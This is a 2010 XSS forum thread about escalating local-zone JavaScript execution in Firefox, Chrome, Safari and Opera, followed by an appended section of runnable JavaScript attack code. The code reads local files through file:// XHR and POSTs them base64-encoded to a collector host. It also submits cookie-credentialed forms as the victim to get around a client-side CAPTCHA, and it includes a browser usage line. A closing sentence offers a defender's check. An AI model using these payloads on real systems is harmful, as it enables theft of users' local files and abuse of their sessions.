Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
more power!
Posted by: ganger
Date: May 28, 2010 03:30PM

Hi,
I was reading around the web about vulnerabilities like the Universal PDF XSS (linked below)

http://www.gnucitizen.org/blog/universal-pdf-xss-after-party/

and I was thinking about how to use this kind of vuln (where an attacker is able to execute arbitrary JavaScript code in a security zone different from the Internet security zone) to do more.

I already know that with a simple XMLHttpRequest I'm able to upload files to a remote server, and I already know that if the victim is using IE I can use VBScript/ActiveX to obtain remote code execution.

But what can I do if the victim's browser is Safari/Chrome/Opera to obtain remote code execution / download arbitrary files to the victim's PC?

Re: more power!
Posted by: Skyphire
Date: May 28, 2010 04:10PM

PDF is a joke; unless they have turned off JavaScript in PDF, it's almost too easy. I don't even bother to look into PDF exploits; it's like launching Java applets: no brains involved. You don't even need an exploit, just ask for permission to launch it. That's it.

Re: more power!
Posted by: ganger
Date: May 28, 2010 04:34PM

Hmm... but my question was a different one: I linked the PDF vulnerability just as an example.

Re: more power!
Posted by: SW
Date: May 29, 2010 05:39AM

You must find an exploit for the browser for that, which would be quite serious; XSS is just for JavaScripting and usually not very useful.

Re: more power!
Posted by: thornmaker
Date: May 29, 2010 11:21AM

/facepalm

Re: more power!
Posted by: ganger
Date: May 30, 2010 12:40PM

Let's assume that I found a vulnerability that allows an attacker to execute arbitrary JavaScript code in the local security zone of a web browser. If this vulnerability was found in Internet Explorer, I could use ActiveX/VBScript to obtain code execution / download arbitrary files. But what can I do if this kind of vulnerability is found in a browser like Mozilla Firefox/Google Chrome/Safari/Opera?

I know that it is possible to use XMLHttpRequest to upload arbitrary files to a remote server, but what else?

Re: more power!
Posted by: Neo139
Date: May 30, 2010 02:22PM

Stuff on the website itself, like getting his cookie or posting forms without a CAPTCHA.

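Added example, not from any poster in this thread: the two primitives the thread keeps circling back to, written as payload building blocks. The first is ganger's "XMLHttpRequest can upload files" point (a synchronous XHR read of a file:// URL, which only succeeds because the script runs in the local/privileged zone, followed by a POST to a collector); the second is Neo139's "post forms without CAPTCHA" point (a credentialed form submission that rides on the victim's session cookie). The local file contents, the collector URL (https://collector.example/drop), the target site and its cookie are all constructed here so the block runs offline in Node; in a browser you would pass the real XMLHttpRequest instead of the FakeXHR stand-in.

```javascript
// Constructed stand-in for the victim's file system and the target site.
// None of these values come from the thread; they exist so the example runs offline.
const FAKE_LOCAL_FILES = {
  "file:///C:/Users/victim/secret.txt": "s3cret-token-42\n",
};
const FAKE_SITE_COOKIE = "session=abc123";

// Minimal XMLHttpRequest double: serves file:// reads from FAKE_LOCAL_FILES and
// records every other request (with the cookie a browser would attach) so the
// outbound traffic can be inspected.
class FakeXHR {
  static sent = [];
  open(method, url, async = true) {
    this.method = method;
    this.url = url;
    this.async = async;
    this.headers = {};
  }
  setRequestHeader(name, value) {
    this.headers[name] = value;
  }
  send(body) {
    if (this.url.startsWith("file://")) {
      const data = FAKE_LOCAL_FILES[this.url];
      this.status = data === undefined ? 404 : 200;
      this.responseText = data === undefined ? "" : data;
    } else {
      FakeXHR.sent.push({
        method: this.method,
        url: this.url,
        headers: this.headers,
        body,
        cookie: FAKE_SITE_COOKIE, // credentialed request: victim's session rides along
      });
      this.status = 200;
      this.responseText = "";
    }
    if (this.onload) this.onload();
  }
}

// Base64 for latin-1 text: btoa in a browser, Buffer in Node.
function toBase64(text) {
  return typeof btoa === "function"
    ? btoa(text)
    : Buffer.from(text, "binary").toString("base64");
}

// 1. Read a local file with a synchronous XHR (works only from the local zone)
//    and POST it to the collector as JSON. Returns the payload sent, or null if
//    the file could not be read. Some engines report status 0 for file:// URLs.
function exfiltrateLocalFile(localUrl, collectorUrl, XHR) {
  const reader = new XHR();
  reader.open("GET", localUrl, false); // false = synchronous
  reader.send(null);
  if (reader.status !== 200 && reader.status !== 0) return null;

  const payload = JSON.stringify({
    path: localUrl,
    bytes: reader.responseText.length,
    data: toBase64(reader.responseText),
  });
  const uploader = new XHR();
  uploader.open("POST", collectorUrl, true);
  uploader.setRequestHeader("Content-Type", "application/json");
  uploader.send(payload);
  return payload;
}

// 2. Submit a form on the target site as the victim. The browser attaches the
//    session cookie, so a client-side CAPTCHA widget is irrelevant: only a
//    server-side check of the CAPTCHA answer (or a CSRF token) would stop this.
//    Returns the urlencoded body that was sent.
function postFormAsVictim(actionUrl, fields, XHR) {
  const body = Object.entries(fields)
    .map(([k, v]) => encodeURIComponent(k) + "=" + encodeURIComponent(v))
    .join("&");
  const xhr = new XHR();
  xhr.open("POST", actionUrl, true);
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  xhr.withCredentials = true; // send cookies cross-origin where the browser allows it
  xhr.send(body);
  return body;
}

// Usage (browser): exfiltrateLocalFile("file:///C:/boot.ini", "https://collector.example/drop", XMLHttpRequest);
```

The check a defender takes from this is the mirror image: the exfiltration step depends on the script being allowed to read file:// URLs at all, and the forced post depends on the target accepting a submission whose only "proof of human" lives client-side, so test the server with a raw POST that omits the CAPTCHA answer entirely.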